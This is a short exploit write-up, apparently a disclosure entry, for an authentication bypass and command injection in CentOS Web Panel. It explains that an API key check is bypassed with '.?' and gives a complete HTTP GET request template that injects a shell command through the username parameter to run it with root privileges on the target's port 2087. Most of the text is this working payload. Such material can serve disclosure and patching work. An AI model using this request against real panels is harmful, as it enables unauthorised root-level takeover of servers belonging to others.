This is a very very rare case on CentOS Web Panel. Key value should be set on target CentOS Web Panel. When key value has been set on target, this can be bypassed with ".?" and without key value, commands can be executed on target system via root level privileges.
command injection on username parameter.
GET /admin/index.php?api=test&key=.?&action=xml&username=root;[command_here]%0A HTTP/1.1 Host: target:2087 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36